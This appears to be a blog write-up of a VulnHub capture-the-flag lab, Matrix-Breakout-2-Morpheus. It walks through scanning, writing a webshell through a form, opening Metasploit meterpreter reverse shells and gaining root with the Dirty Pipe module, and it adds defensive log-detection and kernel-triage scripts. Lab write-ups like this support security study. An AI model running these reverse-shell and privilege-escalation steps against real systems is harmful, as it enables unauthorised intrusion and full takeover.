Matrix-Breakout-2-Morpheus

Target machine description

https://www.vulnhub.com/entry/matrix-breakout-2-morpheus,757/

Host discovery

┌──(kali㉿kali)-[/miao/vulnhub/matrix-breakout-2-morpheus]
└─$ sudo nmap -sn 192.168.1.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-10 15:33 CST
Nmap scan report for 192.168.1.1
Host is up (0.00012s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.1.2
Host is up (0.00023s latency).
MAC Address: 00:50:56:E8:96:F1 (VMware)
Nmap scan report for 192.168.1.6
Host is up (0.00042s latency).
MAC Address: 00:0C:29:47:20:8B (VMware)
Nmap scan report for 192.168.1.254
Host is up (0.0018s latency).
MAC Address: 00:50:56:EF:22:46 (VMware)
Nmap scan report for 192.168.1.5
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 28.00 seconds

nmap scanning

(1) Run a port scan

┌──(kali㉿kali)-[/miao/vulnhub/matrix-breakout-2-morpheus]
└─$ sudo nmap -sT --min-rate 10000 -p- 192.168.1.6 -oA nmapscan/ports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-10 15:34 CST
Nmap scan report for 192.168.1.6
Host is up (0.0029s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
81/tcp open hosts2-ns
MAC Address: 00:0C:29:47:20:8B (VMware)

Nmap done: 1 IP address (1 host up) scanned in 20.39 seconds
  • Ports 22, 80 and 81 are open
    (2) Scan the open ports in detail
    ┌──(kali㉿kali)-[/miao/vulnhub/matrix-breakout-2-morpheus]
    └─$ sudo nmap -sT -sV -O --min-rate 10000 -p22,80,81 192.168.1.6 -oA nmapscan/detail
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-10 15:35 CST
    Nmap scan report for 192.168.1.6
    Host is up (0.00076s latency).

    PORT STATE SERVICE VERSION
    22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
    80/tcp open http Apache httpd 2.4.51 ((Debian))
    81/tcp open http nginx 1.18.0
    MAC Address: 00:0C:29:47:20:8B (VMware)
    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
    Aggressive OS guesses: Linux 5.0 - 5.5 (99%), Linux 2.6.32 (96%), Linux 3.2 - 4.9 (96%), Netgear ReadyNAS 2100 (RAIDiator 4.2.24) (96%), Linux 2.6.32 - 3.10 (96%), Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (96%), Sony X75CH-series Android TV (Android 5.0) (95%), Linux 3.1 (95%), Linux 3.2 (95%)
    No exact OS matches for host (test conditions non-ideal).
    Network Distance: 1 hop
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 23.03 seconds
  • Port 22 is the SSH service, port 80 is Apache, and port 81 is Nginx
    (3) Run a UDP scan
    ┌──(kali㉿kali)-[/miao/vulnhub/matrix-breakout-2-morpheus]
    └─$ sudo nmap -sU -p22,80,81 192.168.1.6 -oA nmapscan/udp
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-10 15:36 CST
    Nmap scan report for 192.168.1.6
    Host is up (0.00094s latency).

    PORT STATE SERVICE
    22/udp closed ssh
    80/udp closed http
    81/udp closed hosts2-ns
    MAC Address: 00:0C:29:47:20:8B (VMware)

    Nmap done: 1 IP address (1 host up) scanned in 13.33 seconds
  • None of these ports is open over UDP
    (4) Run a vulnerability scan
    ┌──(kali㉿kali)-[/miao/vulnhub/matrix-breakout-2-morpheus]
    └─$ sudo nmap --script=vuln -p22,80,81 192.168.1.6 -oA nmapscan/vuln
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-10 15:37 CST
    Nmap scan report for 192.168.1.6
    Host is up (0.00068s latency).

    PORT STATE SERVICE
    22/tcp open ssh
    80/tcp open http
    |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
    |_http-csrf: Couldn't find any CSRF vulnerabilities.
    |_http-dombased-xss: Couldn't find any DOM based XSS.
    | http-enum:
    |_ /robots.txt: Robots file
    81/tcp open hosts2-ns
    MAC Address: 00:0C:29:47:20:8B (VMware)

    Nmap done: 1 IP address (1 host up) scanned in 44.30 seconds
  • On port 80, a robots.txt file was found

Web penetration

Port 80 penetration

(1) Visit port 80: it is a static page that hints at SSH access

(2) Run a directory scan

┌──(kali㉿kali)-[/miao/vulnhub/matrix-breakout-2-morpheus]
└─$ sudo gobuster dir -u http://192.168.1.6 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.6
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,txt,html
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 276]
/index.html (Status: 200) [Size: 348]
/.html (Status: 403) [Size: 276]
/javascript (Status: 301) [Size: 315] [--> http://192.168.1.6/javascript/]
/robots.txt (Status: 200) [Size: 47]
/graffiti.txt (Status: 200) [Size: 139]
/graffiti.php (Status: 200) [Size: 451]
/.php (Status: 403) [Size: 276]
/.html (Status: 403) [Size: 276]
/server-status (Status: 403) [Size: 276]
Progress: 882236 / 882240 (100.00%)
===============================================================
Finished
===============================================================

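(3) Visit robots.txt; it says there is nothing there

(4) Visit graffiti.txt; it contains a relevant hint

(5) Visit graffiti.php; it has a message box

Web penetration

(1) Submit some arbitrary data as a test; after submission it is displayed on the current page

(2) Inspect the request; the submitted content is written to the graffiti.txt file

(3) Try writing a webshell, saving it as a separate php file

(4) Connect with Godzilla; access succeeds

(5) Use the PMeterpreter module to get a stable reverse shell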

msf6 >  use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 0.0.0.0
lhost => 0.0.0.0
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Sending stage (39927 bytes) to 192.168.1.6
[*] Meterpreter session 1 opened (192.168.1.5:4444 -> 192.168.1.6:47686) at 2025-02-10 16:26:51 +0800

meterpreter >
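
A defender-side view of steps (2) to (4), as an added example that is not part of the original write-up: flag any .php path served successfully that is not in the deployed baseline, and record whether the requesting client had already POSTed to the form. The log lines and the names /x1.php and /admin.php are constructed, and BASELINE is an assumption based on the directory scan above.

```python
import re

# Assumption: the only script the site ships, per the directory scan above.
BASELINE = {"/graffiti.php"}
WRITE_ENDPOINT = "/graffiti.php"  # the form that writes visitor input to disk

# Constructed Apache access-log lines; /x1.php and /admin.php are made-up names.
SAMPLE_LOG = """\
192.168.1.5 - - [10/Feb/2025:16:10:02 +0800] "GET /graffiti.php HTTP/1.1" 200 451
192.168.1.5 - - [10/Feb/2025:16:12:40 +0800] "POST /graffiti.php HTTP/1.1" 200 497
192.168.1.5 - - [10/Feb/2025:16:13:05 +0800] "GET /x1.php HTTP/1.1" 200 0
192.168.1.9 - - [10/Feb/2025:16:14:00 +0800] "GET /admin.php HTTP/1.1" 404 276
192.168.1.5 - - [10/Feb/2025:16:20:11 +0800] "POST /x1.php HTTP/1.1" 200 1204
"""

LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+')

def find_new_scripts(log_text, baseline=BASELINE):
    """Return one alert per .php path served with 2xx that is not in the baseline."""
    posted = set()   # clients that have POSTed to the write endpoint so far
    alerts = {}
    for raw in log_text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue  # skip lines that are not in the expected format
        client, ts, method, url, status = m.groups()
        path = url.split("?", 1)[0]
        if method == "POST" and path == WRITE_ENDPOINT:
            posted.add(client)
            continue
        if path.lower().endswith(".php") and status.startswith("2") and path not in baseline:
            a = alerts.setdefault(path, {"path": path, "first_seen": ts,
                                         "clients": set(), "hits": 0,
                                         "after_form_post": False})
            a["clients"].add(client)
            a["hits"] += 1
            a["after_form_post"] |= client in posted
    return list(alerts.values())

if __name__ == "__main__":
    for alert in find_new_scripts(SAMPLE_LOG):
        print(alert)
```

An alert with after_form_post set points back at the form handler as the write path; the 404 probe for /admin.php is ignored because nothing was served.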

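Privilege escalation: dirtypipe

(1) Use the linux-exploit-suggester.sh script to see which privilege-escalation paths are available; upload the script to the temporary directory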

meterpreter > upload linux-exploit-suggester.sh /tmp/1.sh
[*] Uploading : /miao/vulnhub/matrix-breakout-2-morpheus/linux-exploit-suggester.sh -> /tmp/1.sh
[*] Uploaded -1.00 B of 88.80 KiB (-0.0%): /miao/vulnhub/matrix-breakout-2-morpheus/linux-exploit-suggester.sh -> /tmp/1.sh
[*] Completed : /miao/vulnhub/matrix-breakout-2-morpheus/linux-exploit-suggester.sh -> /tmp/1.sh
meterpreter > shell
Process 1105 created.
Channel 1 created.
cd /tmp
chmod +x 1.sh
./1.sh

(2) Possible exploits are found

(3) Look for a usable exploit module

meterpreter > background 
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > search dirtypipe

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/local/cve_2022_0847_dirtypipe 2022-02-20 excellent Yes Dirty Pipe Local Privilege Escalation via CVE-2022-0847


Interact with a module by name or index. For example info 0, use 0 or use exploit/linux/local/cve_2022_0847_dirtypipe

(4) Use this module to escalate privileges

msf6 exploit(multi/handler) > use exploit/linux/local/cve_2022_0847_dirtypipe 
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/cve_2022_0847_dirtypipe) > sessions

Active sessions
===============

Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter php/linux www-data @ morpheus 192.168.1.5:4444 -> 192.168.1.6:47686 (192.168.1.6)

msf6 exploit(linux/local/cve_2022_0847_dirtypipe) > set session 1
session => 1
msf6 exploit(linux/local/cve_2022_0847_dirtypipe) > run

[-] Msf::OptionValidateError One or more options failed to validate: LHOST.
[*] Exploit completed, but no session was created.
msf6 exploit(linux/local/cve_2022_0847_dirtypipe) > set lhost 0.0.0.0
lhost => 0.0.0.0
msf6 exploit(linux/local/cve_2022_0847_dirtypipe) > run

[*] Started reverse TCP handler on 0.0.0.0:4444
[!] SESSION may not be compatible with this module:
[!] * incompatible session architecture: php
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Linux kernel version found: 5.10.0
[*] Executing exploit '/tmp/.daigaaizfky /bin/passwd'
[*] Exploit completed, but no session was created.
msf6 exploit(linux/local/cve_2022_0847_dirtypipe) > set lhost 192.168.1.5
lhost => 192.168.1.5
msf6 exploit(linux/local/cve_2022_0847_dirtypipe) > run

[*] Started reverse TCP handler on 192.168.1.5:4444
[!] SESSION may not be compatible with this module:
[!] * incompatible session architecture: php
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Linux kernel version found: 5.10.0
[*] Executing exploit '/tmp/.spwuydueg /bin/passwd'
[*] Sending stage (3045380 bytes) to 192.168.1.6
[+] Deleted /tmp/.spwuydueg
[*] Meterpreter session 2 opened (192.168.1.5:4444 -> 192.168.1.6:47730) at 2025-02-10 16:35:44 +0800
meterpreter >

(5) Privilege escalation to root succeeds

meterpreter > getuid
Server username: root
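
The module's automatic check above keys on the kernel version (5.10.0). The same triage from the patching side, as an added example that is not part of the original write-up: classify `uname -r` strings against the upstream fix points for CVE-2022-0847 (introduced in 5.8; fixed in 5.16.11, 5.15.25 and 5.10.102). Every host name except morpheus and every release string except 5.10.0 is constructed.

```python
import re

# Upstream fix points for CVE-2022-0847 (Dirty Pipe).
INTRODUCED = (5, 8, 0)                      # first affected release
FIXED = {(5, 16): 11, (5, 15): 25, (5, 10): 102}
FIRST_CLEAN_SERIES = (5, 17)                # every release from here has the fix

# Constructed inventory; only morpheus / 5.10.0 comes from the session above.
SAMPLE_INVENTORY = {
    "morpheus": "5.10.0",
    "web02": "5.10.102",
    "build01": "5.15.24-generic",
    "legacy": "4.19.0-21-amd64",
    "lab": "6.1.0-18-amd64",
}

def parse_release(release):
    """Turn a `uname -r` string such as '5.15.24-generic' into (5, 15, 24)."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", release)
    if not m:
        raise ValueError(f"unrecognised kernel release: {release!r}")
    return tuple(int(g or 0) for g in m.groups())

def dirtypipe_status(release):
    """Classify a release string against the upstream fix points."""
    ver = parse_release(release)
    series = ver[:2]
    if ver < INTRODUCED:
        return "not-affected"          # predates the bug
    if series >= FIRST_CLEAN_SERIES:
        return "fixed"
    if series in FIXED and ver[2] >= FIXED[series]:
        return "fixed"
    # Unpatched point release, or a series (5.8, 5.9, 5.11 to 5.14)
    # that has no fix point in the table above.
    return "vulnerable-range"

def triage(inventory):
    """Hosts whose release string falls in the vulnerable range, sorted."""
    return sorted(h for h, r in inventory.items()
                  if dirtypipe_status(r) == "vulnerable-range")

if __name__ == "__main__":
    print(triage(SAMPLE_INVENTORY))
```

Distribution kernels often backport fixes without changing the release string, so "vulnerable-range" means the host needs its package version checked against the vendor advisory, not that it is confirmed exploitable.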

View the flag

meterpreter > shell
Process 2917 created.
Channel 1 created.
cat /root/FLAG.txt
You've won!

Let's hope Matrix: Resurrections rocks!

Summary

(1) This is mainly a web-logic penetration
(2) Privilege escalation was a one-shot with msf


Matrix-Breakout-2-Morpheus
http://miao-sec.github.io/Vulnhub/Matrix-Breakout-2-Morpheus/
Author
Miao
Published on
June 20, 2025
License
BY-MIAO